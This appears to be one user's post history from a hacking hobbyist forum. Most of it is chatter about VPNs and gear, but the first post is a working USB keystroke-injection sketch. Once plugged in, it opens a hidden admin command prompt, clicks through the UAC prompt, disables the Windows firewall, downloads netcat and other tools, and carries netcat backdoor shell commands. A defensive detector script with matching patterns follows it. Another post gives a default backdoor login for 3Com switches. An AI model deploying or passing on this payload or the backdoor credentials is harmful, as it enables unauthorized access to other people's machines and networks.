str33ts0ld13r

Everything posted by str33ts0ld13r

  1. Greetings ducky lovers! I'm very excited to finally be making a contribution to the rubber ducky project. To get started you will need Arduino and the phukdlib. DukTape is nothing fancy (pun intended). It will get you wget and a few other toys like nc, then it opens a back door for you to get in. When complete it blinks (big surprise, right!! haha). There is MUCH room for improvement on this but I sadly haven't had time to work on this as much as I would like.. Anyway, I wanted to share what I have put together so far. Please feel free to modify, add, change whatever you like in this code. All that I ask is that you post your changes for the rest of the ducky community. As always, constructive criticism is welcome and appreciated. Warning: I have NOT had a chance to test this code with my Teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me. Warning 2: I haven't set up a kill switch feature yet to keep it from running on systems you don't want it to (i.e. your own system). So you have been warned, it runs every time you plug it in! UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using Ctrl and Esc keys (thanks H@L0_F00 for the Ctrl+Esc combo you posted) and (thanks Jonny_Walked, I used some of the code you posted, UAC handler, and used your cmd launcher) (if this code was Benownzu93's I thank you). Also the PHUKD lib is no longer needed with the updated cmd launcher.

```cpp
/*
################################
###########DukTape##############
################################
Readme:
To use DukTape make sure you have the phukdlib installed in arduino.
I would like to thank everyone on the Rubber Ducky forums
http://www.hak5.org/forums/index.php?showforum=56 who I borrowed ideas and code from.
Debug is done through the serial monitor. To disable it comment out/remove the
code marked as debug (ie.. //debug).
Delays may need to be adjusted...
*/
// Teensy sketch: in the Arduino Tools menu pick a USB Type that includes both
// Keyboard and Serial, otherwise the Keyboard.* calls or Serial will not build.
int ledPin = 11;

void setup() {
  delay(5000); //initial delay
  pinMode(ledPin, OUTPUT);
  Serial.begin(9600); //debug
  delay(200); //debug
  Serial.println("START"); //debug
  //start cmd hidden
  CMD();
  delay(1000);
  MoveWin();
  //prepare work area
  TypeCmd("mkdir %systemroot%\\winduk");
  TypeCmd("cd %systemroot%\\winduk");
  TypeCmd("netsh firewall set opmode disable"); //kill firewall
  //ftp download wget
  TypeCmd("echo bin >>ftpcmd.txt");
  TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt");
  TypeCmd("echo get wget.exe >>ftpcmd.txt");
  TypeCmd("echo quit >>ftpcmd.txt");
  TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download
  delay(6000);
  TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //error recovery in case of wget download fail
  Serial.println("Ftp completed"); //debug
  //Get more tools
  TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip
  TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip"); //get nircmd
  TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd
  TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat
  TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe"); //unzip netcat
  //Payload (both variants are commented out, as posted)
  //TypeCmd("nc -l -p 1337 -d -e cmd.exe"); //netcat listens on port leet and launches cmd when a connection is established
  //TypeCmd("nc -d IP PORT -e cmd.exe"); //reverse netcat: replace IP with your ip address and PORT with the port you use on the system you want to connect back to; run "nc -l -p PORT" without the quotes on your system to accept the reverse connection
  //clean up
  TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip");
  TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt");
  TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip");
  TypeCmd("exit"); //close cmd.
  Serial.println("ALL DONE!"); //debug
}

void loop() {
  digitalWrite(ledPin, HIGH); // LED on
  delay(500);
  digitalWrite(ledPin, LOW); // LED off
  delay(500);
}

void Enter() {
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

void TypeCmd(const char *commandtotype) { //must have cmd prompt open to work
  Keyboard.println(commandtotype); //type the command that was passed in
  delay(200);
  Enter();
  delay(2000); //Execution delay
  Serial.println(commandtotype); //debug: echo the same command to the serial monitor
}

void MoveWin() {
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.set_key2(KEY_M);
  Keyboard.send_now();
  delay(50);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.set_key2(0);
  Keyboard.send_now();
  delay(50);
  for (int x = 0; x < 200; ++x) { //push the window up off the screen
    Keyboard.set_key1(KEY_UP);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
  }
  Enter();
}

void UAC() {
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void CMD() {
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("cmd");
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(2000);
  UAC();
}
```
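A defender-side companion to the sketch above, added here and not part of the original post: it runs a few rules over constructed process-creation records (field names loosely after Sysmon Event ID 1 / Security 4688 command-line auditing, assumed, not real telemetry) and only flags a parent process when several steps of the DukTape sequence fire within a short window, since a lone scripted ftp or wget is common admin activity. The firewall rule goes slightly beyond the post and also covers the newer netsh advfirewall syntax.

```python
import re
from collections import defaultdict

# Constructed sample events: a cmd.exe (pid 100) driving the DukTape steps, and
# an unrelated scripted ftp job (parent pid 200) that should not be flagged.
EVENTS = [
    {"t": 10.0, "ppid": 100, "image": "cmd.exe",   "cmdline": "cmd"},
    {"t": 12.5, "ppid": 100, "image": "netsh.exe", "cmdline": "netsh firewall set opmode disable"},
    {"t": 14.8, "ppid": 100, "image": "ftp.exe",   "cmdline": "ftp -A -v -s:ftpcmd.txt cam.ctan.org"},
    {"t": 23.1, "ppid": 100, "image": "wget.exe",  "cmdline": "wget -q http://www.nirsoft.net/utils/nircmd.zip"},
    {"t": 25.4, "ppid": 100, "image": "nc.exe",    "cmdline": "nc -l -p 1337 -d -e cmd.exe"},
    {"t": 90.0, "ppid": 200, "image": "ftp.exe",   "cmdline": "ftp -s:deploy.txt files.corp.example"},
]

# One rule per step of the sequence; the old "netsh firewall" and the newer
# "netsh advfirewall ... state off" forms both count as disabling the firewall.
RULES = {
    "firewall_disabled": re.compile(r"\bnetsh\b.*firewall.*\b(opmode\s+disable|state\s+off)\b", re.I),
    "scripted_ftp": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
    "tool_download": re.compile(r"\bwget(\.exe)?\b.*\bhttps?://", re.I),
    "netcat_shell": re.compile(r"\bnc(\.exe)?\b.*-e\s+cmd(\.exe)?", re.I),
}

def match_rules(cmdline):
    """Names of every rule whose pattern matches this command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def detect(events, window=60.0, min_rules=2):
    """Group hits by parent pid; flag a parent when at least `min_rules`
    distinct rules fire within `window` seconds of its first hit.
    Returns {ppid: sorted rule names} for flagged parents only."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["t"]):
        for name in match_rules(ev["cmdline"]):
            hits[ev["ppid"]].append((ev["t"], name))
    flagged = {}
    for ppid, seq in hits.items():
        start = seq[0][0]
        names = {name for t, name in seq if t - start <= window}
        if len(names) >= min_rules:
            flagged[ppid] = sorted(names)
    return flagged

if __name__ == "__main__":
    for ppid, names in detect(EVENTS).items():
        print(f"parent pid {ppid}: {', '.join(names)}")
```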
  2. I want to give a huge thanks to Darren for the ducky kit!! Mine showed up today. The mail actually delivered it to the next street over but the guy that lives there brought it over! Maybe I should head to the casino with luck like this.
  3. Got signed up, been waiting about 10 hours for this lol. Hope I make the cut, and didn't stay up for 24 hours for nothing lol. Good luck to everyone else too. I'm really happy to see so much support for this so quickly!! Now it's time to take a nap..
  4. That's a sweet setup, especially the dual WAN.. However I don't think that the tucked away to look normal concept really works (it's ok though, I still tuck mine away to look normal too, although it really doesn't work for me either lol).
  5. That's sweet man. I've been playing with it in a VM for a few hours. I haven't had any problems with it. A few suggestions I could make would be to add Cain & Abel (I know it's a tool that is looked down upon but there is no denying that it does have a lot of useful features), maybe Wireshark. I like how the UI is real simple and not cluttered with things that you don't need. I'm really looking forward to the future releases! If I can help with anything PM me.
  6. Hell, they don't need to put cameras or mics in anyone's house, we all put them there for them, i.e. cell phone, regular phone, web cam, plus there are the billions of security / traffic cams they have.. They can tap everything anyway....
  7. Damn I hate being broke.. I always like picking up new equipment...
  8. Or you can always go with game name filetype:torrent in a Google search. Makes things real nice and fast.
  9. You can just get a free shell account from somewhere that allows SSH (most do) and tunnel through that. What I use for my tunnels is my HP server LC2000 (I know it's ancient but it works for me, plus it was free). You always do have the option of just taking one of the junk computers you probably have laying around and putting Linux on it. Ubuntu is really really easy to set up, then just connect it to your network and run it headless. That's usually a cheap way. If you don't have a crapo machine laying around, garage sales are usually a good place to find one.
  10. So are we going to get back on topic or what, people?
  11. Where the hell is this thing legal for free? I ran Tor through like 30 different countries and the best I could find is access to the premium one....
  12. All very good videos, I've had them for quite a while and watch them regularly.
  13. starchfish: for the 3Com firmware 7.0.1 and 8.1.1 (you should be able to get the firmware here if you don't have it: infodeli.3com.com) there is a back door login of debug with the password synnet, just telnet in. It's a major security flaw that they put in that you should probably fix once you get your switches back up..
  14. Exactly the way I feel is if they are willing to learn I don't mind helping them. But ya, we all have those people that we can't stand.. Yours is Steve Jobs, mine is pretty much all sys-admin/IT departments, but the one that we can all agree on are those little internet punks.. (I'm sure I'm gonna get flamed for that IT comment (for all you flamers the key words in that sentence were "pretty much")).
  15. Ya, skiddies are a pain in the ass (I mean I'll defend noobs because they haven't had the chance to learn yet but skiddies don't want to learn). I like the invite only thing; a registration would be one of the best security measures we could take. (Note: everyone who helps contribute to this project will have access to the hak5 VPN before anyone else is invited.) Registrations will be included in this. Thank you for that input Swathe, that would be sweet. Encryption is always good.. Sorry to everyone, I haven't been able to do as much with this project as I would like. I have a few other projects that have been taking up a considerable amount of my time, but not to worry, those projects are just about wrapped up and I will be able to focus more of my time on this. I hope to really get things moving on this in the next week or so. Now to just make sure everyone is in agreement, we are going with OpenVPN....?..
  16. Ok, first off you don't have to port forward your router unless you are connecting to your LAN from the outside internet (i.e. coffee shop wifi connection back through your router to your SSH server). What client are you using? Are you trying to run your sshd on your laptop and connect to it through the loopback adapter (i.e. 127.0.0.1) or are you running your sshd on a separate machine?
  17. That would be pretty sweet, to add any features that Hamachi has that OpenVPN is missing. If you can code that would be great, I'm not much good when it comes to coding. What were you thinking of adding?? That's why we have to find a way to make it as secure as possible; your only line of defense shouldn't be your router firewall. I agree that there are a lot of security risks involved and that is one of my main concerns.. Seeing as how it has come up before, there is an interest in it, and I think that there is a way to make it work securely.
  18. Damn, I don't know how you do it iisonly... I don't even have enough time to read all the things I need to and I don't even subscribe to any RSS feeds... I agree, legend.. and kudos.
  19. To be perfectly honest I have never done anything with a VPN before this. But the way I feel is that people need to learn things and shouldn't use a weaker product because it's easier. Plus this will be a community project so there will be plenty of help for people that have questions. Well, speed is key, especially with gaming. Thank you bit hunter for that information. Control over your connections is important when it comes to security. I think that with everything that we know now we should go with OpenVPN. Plus there is the fact that the hak5 crew are supposed to feature some things on it in a future ep. Since this is a community project I created a new thread in projects>community projects labeled Hak5 vpn (link to it http://hak5.org/forums/index.php?showtopic=11914) so let's move all discussion over there.
  20. I started this thread to move discussion of the hak5 VPN out of the questions section where it started. I will update this first post with all the information that is needed for this project. Please make your comments in this thread instead of the thread in questions.
  21. Obviously you want to use multiple layers of cryptography and hidden volumes for your data, but there needs to be a legit reason for your data being there and consuming that much space. As SomethingToChatWith said, by renaming it a doc file it won't open in simple editors, but if you're going through this much work already your opponent won't be using WordPad. The answer to this is rare formats that consume lots and lots of space. And you can always hide it in a .rar file then tuck that in an ISO or something.. Encryption is just a game of hide and seek.
  22. Gaming over the VPN is one of my biggest interests, well that and security. I think the choice is going to come down to Hamachi and OpenVPN. I did hear OpenVPN mentioned in the show today, during the firewall section.
  23. Ok all, I've been doing some research on all of this. I've come across 2 other projects besides Leaf: the first is called Hamachi, which buzzinh showed me, and the other one is OpenVPN. Here are the links to the info on all the VPNs. Leaf Networks: the main site is posted earlier in the forum; http://techie-buzz.com/online-goodies/leaf...y-hardware.html is an article I found on it (there is not much good information on it out there). Hamachi: https://secure.logmein.com/products/hamachi/vpn.asp?lang=en is the main site, and http://en.wikipedia.org/wiki/Hamachi. OpenVPN: http://openvpn.net/ and http://en.wikipedia.org/wiki/OpenVPN. I would like to know what everyone thinks would be best. By the way, I would really like to see more people get involved with creating the hak5 VPN, so let us know what you think.